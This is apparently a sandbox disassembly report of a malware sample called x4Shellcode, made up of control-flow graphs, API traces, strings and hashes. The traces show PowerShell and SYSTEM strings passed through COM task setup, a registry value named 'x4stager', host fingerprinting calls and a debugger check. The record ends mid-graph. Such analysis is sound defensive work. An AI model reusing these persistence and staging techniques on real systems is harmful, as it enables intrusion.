                                                  control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 122 401456 118->122 123 4013b9-4013c7 118->123 119->114 124 401459-401462 122->124 123->122 126 4013cd-4013db 123->126 124->119 126->122 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                                                  APIs
                                                  • SysAllocString.OLEAUT32(x4svc64), ref: 004011C2
                                                  • SysAllocString.OLEAUT32(00402220), ref: 004011CC
                                                  • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                  • SysAllocString.OLEAUT32(?), ref: 004011E0
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                  • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                  • VariantInit.OLEAUT32(?), ref: 00401250
                                                  • VariantInit.OLEAUT32(?), ref: 004013EA
                                                  • VariantInit.OLEAUT32(?), ref: 004013F0
                                                  • VariantInit.OLEAUT32(?), ref: 00401400
                                                  • CoUninitialize.OLE32 ref: 004014E8
                                                  • SysFreeString.OLEAUT32(?), ref: 004014FA
                                                  • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                                                  • SysFreeString.OLEAUT32(?), ref: 00401502
                                                  • SysFreeString.OLEAUT32(?), ref: 00401507
                                                  • SysFreeString.OLEAUT32(?), ref: 0040150C
                                                  • SysFreeString.OLEAUT32(?), ref: 00401511
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                  • String ID: SYSTEM$powershell$x4svc32$x4svc64
                                                  • API String ID: 3960698109-3219379883
                                                  • Opcode ID: ca5d541f3a6729368af002c5c6c477bf489252f1c394c39f9f536de11aa6d916
                                                  • Instruction ID: 9d7d999b42c47ed0acaeb10156d8a1bbf201da374183d36ea7091f8d188653a9
                                                  • Opcode Fuzzy Hash: ca5d541f3a6729368af002c5c6c477bf489252f1c394c39f9f536de11aa6d916
                                                  • Instruction Fuzzy Hash: 6CC1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD05CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 738 401674-4016a1 SysAllocString * 2 CoInitializeEx 739 401782 738->739 740 4016a7-4016bb CoInitializeSecurity 738->740 743 401785-401797 SysFreeString * 2 739->743 741 4016c8-4016e4 CoCreateInstance 740->741 742 4016bd-4016c2 740->742 744 401777 741->744 745 4016ea-401729 VariantInit 741->745 742->741 742->744 746 40177a-401780 CoUninitialize 744->746 747 40172d-401732 745->747 746->743 748 401734-40174a 747->748 749 401769 747->749 750 40176c-401775 748->750 752 40174c-401767 748->752 749->750 750->746 752->750
                                                  APIs
                                                  • SysAllocString.OLEAUT32(x4svc64), ref: 00401686
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00401699
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                  • VariantInit.OLEAUT32(?), ref: 004016EE
                                                  • CoUninitialize.OLE32 ref: 0040177A
                                                  • SysFreeString.OLEAUT32(?), ref: 0040178C
                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID: x4svc32$x4svc64
                                                  • API String ID: 4184240511-89065942
                                                  • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                  • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                                                  • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                  • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae976f4a37bbee7b09bc5bcd01063250c70073540a6e7900c888b013c841bd9d
                                                  • Instruction ID: 18a1c05e8b1c9f113c3f5fa99e5e7e5159ec476a7072d63e4a098495f602b0a4
                                                  • Opcode Fuzzy Hash: ae976f4a37bbee7b09bc5bcd01063250c70073540a6e7900c888b013c841bd9d
                                                  • Instruction Fuzzy Hash: AEA28271A1D3808FC735CB18C8547AABBE1AFD5318F0D4959E8DA97292D339AC048B97

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1225 401986-4019b1 lstrlenW call 40104b 1228 4019b3-4019bd StrStrIW 1225->1228 1229 4019dd-4019e0 1225->1229 1228->1229 1230 4019bf 1228->1230 1231 4019c0-4019da StrStrIW 1230->1231 1231->1231 1232 4019dc 1231->1232 1232->1229
                                                  APIs
                                                  • lstrlenW.KERNEL32(Get-Delegate,00000000,00402224), ref: 00401999
                                                  • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                                                  • StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 004019D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: Get-Delegate
                                                  • API String ID: 1659193697-1365458365
                                                  • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                  • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                                                  • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                  • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664
                                                  APIs
                                                  • GetFileSize.KERNEL32(?,00768FCC,?,00000001,?,00000002,?,?), ref: 007698BE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: FileSize
                                                  • String ID:
                                                  • API String ID: 3433856609-0
                                                  • Opcode ID: cb02e8c6f8eee6fad8fa80eb1cf1c9a265d9af42faba446d7bf0c07f19a4c874
                                                  • Instruction ID: 6bce4fd10f3375c303c63da7c09f74d62ed41c043cc7bd9cb9bdae4af2156565
                                                  • Opcode Fuzzy Hash: cb02e8c6f8eee6fad8fa80eb1cf1c9a265d9af42faba446d7bf0c07f19a4c874
                                                  • Instruction Fuzzy Hash: 689116A050C3819FCB764A2898146757BAC5FA2320F4C079BDE878B4E3DA7D9C09C763

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1460 787df0-787dfa 1461 788288-78829a call 770d80 1460->1461 1462 787e00 1460->1462 1469 78851e-78852d call 770d80 1461->1469 1470 7882a0 1461->1470 1462->1461 1463 787e06-787e15 GetComputerNameW 1462->1463 1465 787e1b 1463->1465 1466 7882b6-7882bb 1463->1466 1465->1466 1468 787e21-787e2d 1465->1468 1470->1469 1472 7882a6 1470->1472 1474 787dbc-787dce 1472->1474 1475 7882ac 1472->1475 1482 787d6c-787d80 GetVolumeInformationW 1474->1482 1483 787d35 1474->1483 1478 787d20-787d2b 1475->1478 1479 7882b2-7882b4 1475->1479 1480 787d2d-787d94 1478->1480 1481 787d61-787d68 1478->1481 1479->1466 1480->1481 1488 787d96 1480->1488 1486 787d6a 1481->1486 1487 787de5-787dea 1481->1487 1483->1482 1485 787d37-787d39 1483->1485 1489 787d3b-787d46 1485->1489 1486->1482 1486->1487 1490 787dec 1487->1490 1491 787d83-787d8c GetWindowsDirectoryW 1487->1491 1492 787d97-787d98 1488->1492 1489->1492 1493 787d48-787dac 1489->1493 1490->1491 1494 787dee 1490->1494 1491->1489 1495 787d8e-787da6 1491->1495 1496 787d9a-787d9f 1492->1496 1497 787de2 1492->1497 1493->1492 1501 787dae-787db3 1493->1501 1494->1460 1495->1474 1500 787da8 1495->1500 1500->1474 1502 787daa-787dba 1500->1502 1502->1474
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID:
                                                  • API String ID: 3545744682-0
                                                  • Opcode ID: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                                  • Instruction ID: 3d64e0040f1da20c81796767601268e243b1d6406b2aa11ff29f50002a13ad56
                                                  • Opcode Fuzzy Hash: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                                  • Instruction Fuzzy Hash: 9421F4B57CC3407BD63D76148C0ABB53A642FA1B10FB88485E48B551D2E66CEC09C3B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: VhS`v
                                                  • API String ID: 0-1031945693
                                                  • Opcode ID: 04f6699276af9bf467d778c006b51d44b9dee1600e7a546500b6917e06b6c212
                                                  • Instruction ID: 584225c2b1720e1b14d47b78b3d8641e7d6c622e20655bd0b4911c11efa81458
                                                  • Opcode Fuzzy Hash: 04f6699276af9bf467d778c006b51d44b9dee1600e7a546500b6917e06b6c212
                                                  • Instruction Fuzzy Hash: 44711A7190CF809FCB3647288414AB5BB606B62324F8C86A9DC974F1E2D67E8D44F392

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1647 401798-40179e call 4017a5 ExitProcess
                                                  APIs
                                                    • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                    • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                    • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                    • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                    • Part of subcall function 004017A5: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                    • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,x4stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                  • ExitProcess.KERNEL32 ref: 0040179E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                  • String ID:
                                                  • API String ID: 3836967525-0
                                                  • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                  • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                                                  • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1650 765d20 1651 765d26-765d2d 1650->1651 1652 765d22 1650->1652 1654 765d36-765d37 1651->1654 1655 765d2f 1651->1655 1652->1651 1653 765d24 1652->1653 1653->1651 1657 765d5d 1654->1657 1658 765d39-765d42 VirtualAlloc 1654->1658 1655->1654 1656 765d30-765d31 1655->1656 1660 765d33-765d35 1656->1660 1661 765d64 1657->1661 1662 765d5f 1657->1662 1659 765d44 1658->1659 1658->1660 1659->1660 1663 765d46-765d50 1659->1663 1660->1654 1665 765d66 1661->1665 1666 765d69-765d73 VirtualFree 1661->1666 1662->1661 1664 765d61 1662->1664 1667 765d54-765d5b 1663->1667 1668 765d52 1663->1668 1664->1661 1669 765d63 1664->1669 1665->1666 1670 765d68 1665->1670 1667->1657 1667->1661 1668->1667 1669->1661 1670->1666
                                                  APIs
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00765D6D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                                  • Instruction ID: 640acb43539dd74268d849af1cf2ffaa62d2a3b224fcc9296926887465bd92d5
                                                  • Opcode Fuzzy Hash: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                                  • Instruction Fuzzy Hash: 8AF0E951B04F40BACE3E1364EDDDB752A209B53738F0C4345AEA3290F2875D1C06FA02
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ffdb135e52a00b2d305e1e12d1b81c975d1811e8bc8a5998384ed8b3b05115
                                                  • Instruction ID: ad673c048a41e1df862d3ef3e4638037cbed3a7bfe6958097567f989d12de228
                                                  • Opcode Fuzzy Hash: 44ffdb135e52a00b2d305e1e12d1b81c975d1811e8bc8a5998384ed8b3b05115
                                                  • Instruction Fuzzy Hash: 5131EA7090C3809FCB358B69C454775BFA07BA2710FC885AADC878A2E2D67D8D04D753
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE ref: 0076608C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: c21fb602f68d0b72d89acfff2a5dd39775b092e4575aa8d164067749d1f33541
                                                  • Instruction ID: 405eca0d6466786c46f9be135440743236037be62ec1ec39bb0d5cbc69864ccc
                                                  • Opcode Fuzzy Hash: c21fb602f68d0b72d89acfff2a5dd39775b092e4575aa8d164067749d1f33541
                                                  • Instruction Fuzzy Hash: B701F5B180D3449FCB2A8B248414776BFB06F53310F888AAAEC838B1E2D23C8C04D752
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007A1459
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007A1463
                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 007A1470
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                                  • Instruction ID: e637d6a1043264dc612aa71ff9f30d96a4cb5581d62438a0d496efd7a84ca8fa
                                                  • Opcode Fuzzy Hash: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                                  • Instruction Fuzzy Hash: BA31D67490122CEBCB21DF68D888B9DB7B8AF89310F5042DAE41CA7250E7749F858F55
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F5E
                                                  • TerminateProcess.KERNEL32(00000000,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F65
                                                  • ExitProcess.KERNEL32 ref: 007A3F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                                  • Instruction ID: 755a9a8e1f371a328a975a46e8387f8448eca3157b9ea724e710170bbb6402f3
                                                  • Opcode Fuzzy Hash: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                                  • Instruction Fuzzy Hash: 47E04632414948FFCF016F28DC08A593B3AEBC6341F008514F8058A122DB3DDE42CB86
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                  • Instruction ID: a686ec5952aced09ec25e1db7898984459b8803189b32820955196b6e2c3f6d4
                                                  • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                  • Instruction Fuzzy Hash: 0A311661907384EEDF32CA189824AF77B649BE1370F1DC157E48C8B392D16D9C60CAAC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2591 7a24ff-7a2513 2592 7a2581-7a2589 2591->2592 2593 7a2515-7a251a 2591->2593 2594 7a258b-7a258e 2592->2594 2595 7a25d0-7a25e8 call 7a2672 2592->2595 2593->2592 2596 7a251c-7a2521 2593->2596 2594->2595 2597 7a2590-7a25cd call 7a2096 * 4 2594->2597 2603 7a25eb-7a25f2 2595->2603 2596->2592 2599 7a2523-7a2526 2596->2599 2597->2595 2599->2592 2602 7a2528-7a2530 2599->2602 2604 7a254a-7a2552 2602->2604 2605 7a2532-7a2535 2602->2605 2607 7a2611-7a2615 2603->2607 2608 7a25f4-7a25f8 2603->2608 2610 7a256c-7a2580 call 7a2096 * 2 2604->2610 2611 7a2554-7a2557 2604->2611 2605->2604 2609 7a2537-7a2549 call 7a2096 call 7a3073 2605->2609 2618 7a262d-7a2639 2607->2618 2619 7a2617-7a261c 2607->2619 2613 7a25fa-7a25fd 2608->2613 2614 7a260e 2608->2614 2609->2604 2610->2592 2611->2610 2616 7a2559-7a256b call 7a2096 call 7a3171 2611->2616 2613->2614 2622 7a25ff-7a260d call 7a2096 * 2 2613->2622 2614->2607 2616->2610 2618->2603 2621 7a263b-7a2648 call 7a2096 2618->2621 2626 7a262a 2619->2626 2627 7a261e-7a2621 2619->2627 2622->2614 2626->2618 2627->2626 2635 7a2623-7a2629 call 7a2096 2627->2635 2635->2626
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 007A2543
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3090
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30A2
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30B4
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30C6
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30D8
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30EA
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30FC
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A310E
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3120
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3132
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3144
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3156
                                                    • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3168
                                                  • _free.LIBCMT ref: 007A2538
                                                    • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                                    • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                                  • _free.LIBCMT ref: 007A255A
                                                  • _free.LIBCMT ref: 007A256F
                                                  • _free.LIBCMT ref: 007A257A
                                                  • _free.LIBCMT ref: 007A259C
                                                  • _free.LIBCMT ref: 007A25AF
                                                  • _free.LIBCMT ref: 007A25BD
                                                  • _free.LIBCMT ref: 007A25C8
                                                  • _free.LIBCMT ref: 007A2600
                                                  • _free.LIBCMT ref: 007A2607
                                                  • _free.LIBCMT ref: 007A2624
                                                  • _free.LIBCMT ref: 007A263C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                                  • Instruction ID: dafd9618f2d771c123102158a0e78d17cf2491fac3ed14588e1fc89b0e8e386b
                                                  • Opcode Fuzzy Hash: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                                  • Instruction Fuzzy Hash: C4316A71A00301DFEB31AA3CD809B57B3E9BB82311F204669F46AD7152DE78ED92CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2648 7a1a1b-7a1a36 2649 7a1a48 2648->2649 2650 7a1a38-7a1a46 RtlDecodePointer 2648->2650 2651 7a1a4d-7a1a53 2649->2651 2650->2651 2652 7a1b7a-7a1b7d 2651->2652 2653 7a1a59 2651->2653 2656 7a1bda 2652->2656 2657 7a1b7f-7a1b82 2652->2657 2654 7a1b6e 2653->2654 2655 7a1a5f-7a1a62 2653->2655 2658 7a1b70-7a1b75 2654->2658 2659 7a1a68 2655->2659 2660 7a1b0f-7a1b12 2655->2660 2661 7a1be1 2656->2661 2662 7a1bce 2657->2662 2663 7a1b84-7a1b87 2657->2663 2664 7a1c23-7a1c32 call 7a4c0d 2658->2664 2665 7a1a6e-7a1a73 2659->2665 2666 7a1afc-7a1b0a 2659->2666 2670 7a1b14-7a1b17 2660->2670 2671 7a1b65-7a1b6c 2660->2671 2667 7a1be8-7a1c11 2661->2667 2662->2656 2668 7a1b89-7a1b8c 2663->2668 2669 7a1bc2 2663->2669 2674 7a1aed-7a1af7 2665->2674 2675 7a1a75-7a1a78 2665->2675 2666->2667 2696 7a1c1e-7a1c21 2667->2696 2697 7a1c13-7a1c18 call 7a15d3 2667->2697 2676 7a1b8e-7a1b91 2668->2676 2677 7a1bb6 2668->2677 2669->2662 2678 7a1b19-7a1b1c 2670->2678 2679 7a1b5c-7a1b63 2670->2679 2673 7a1b29-7a1b57 2671->2673 2673->2696 2674->2667 2681 7a1a7a-7a1a7d 2675->2681 2682 7a1ae4-7a1aeb 2675->2682 2684 7a1baa 2676->2684 2685 7a1b93-7a1b98 2676->2685 2677->2669 2678->2664 2686 7a1b22 2678->2686 2679->2661 2688 7a1a7f-7a1a82 2681->2688 2689 7a1ad5-7a1adf 2681->2689 2687 7a1a8f-7a1abf 2682->2687 